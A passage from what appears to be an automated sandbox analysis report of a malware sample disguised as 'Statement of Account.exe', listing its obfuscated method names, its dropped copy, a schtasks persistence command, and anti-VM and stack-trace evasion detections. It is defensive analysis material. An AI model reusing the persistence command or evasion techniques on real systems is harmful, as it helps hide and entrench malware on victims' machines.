          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dHcwPaBtrBVw3QXCBV.csHigh entropy of concatenated method names: 'wwbDETCkwV', 'wdfDjM6tI2', 'LPuDXaShZd', 'PdfDxov5mO', 'C7yD6NCVRs', 'qXyDAboLjZ', 'P88DlMkPCF', 'cDfDk5bYBV', 'UcwD2cNCmf', 'hhJDmohOYy'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.csHigh entropy of concatenated method names: 'N5AnfGnof0', 'moxnVfrmm1', 'xk6nDDJ6tb', 'oMTni8GYbb', 'xFin91jVTq', 'TQ0nTShJSx', 'RXcnwDxRuU', 'Pi8nN54pCw', 'fnHnojHh51', 'QZcngjsdwf'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, NBT97XX2SDM6oGlSbG.csHigh entropy of concatenated method names: 'ToString', 'oNqI0R5w5m', 'XJoI1MfUht', 'RMQIuj56yp', 'Ow8IKTHMmM', 'kAWILdfs4k', 'rMGIGrYoSn', 'WABI8ss1cD', 'WqRI31Qoqv', 'qpHIdxA6Y7'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, RxtZ7GZAg7MmvOfqDD.csHigh entropy of concatenated method names: 'N9g9qQAuGQ', 'wTb9Qluaat', 'HUniugHtit', 'eyfiK5w3K3', 'xh1iLatC5C', 'x76iGg787Q', 'iTxi8bsJZq', 'AlQi3ZAIbQ', 'MGYidlfIGY', 'p75iy2J57r'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, OCG6vC8lrRS2FsMFyk.csHigh entropy of concatenated method names: 'aiwwVXBjwF', 'HRBwi25cLi', 'P65wT6eZdT', 'Op5TmEPFH9', 'KqBTzNBXnx', 'ql8wCx53FR', 'xF9wFcuKW2', 'AkFwS2SahI', 'VkSwnVIUPb', 'M2dwpnscM3'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, b7Ph0RzMVq5MZym5UK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zBVWYfMOU5', 'zkgWaV2f58', 'OQkWIQ0rcw', 'FuwW4bCSMK', 'Fk3WRGfNfp', 'kAKWWRqTkG', 'FGnWPaIr5y'
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, c4WUnNFC4vMmlKQoIHO.csHigh entropy of concatenated method names: 'LspWrWyYMc', 'AdSWUfmPPj', 'k9PWMZDfLp', 'q9lWe79M4u', 'OFkWq2UJJO', 'sb5WOjGTm7', 'kOuWQTdCmG', 'dpYWBahl4J', 'htNW7Ji9uZ', 'RtQWZrKgZT'

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exeFile created: C:\Users\user\AppData\Roaming\SIZfuXT.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: Statement of Account.exe PID: 6684, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SIZfuXT.exe PID: 4176, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
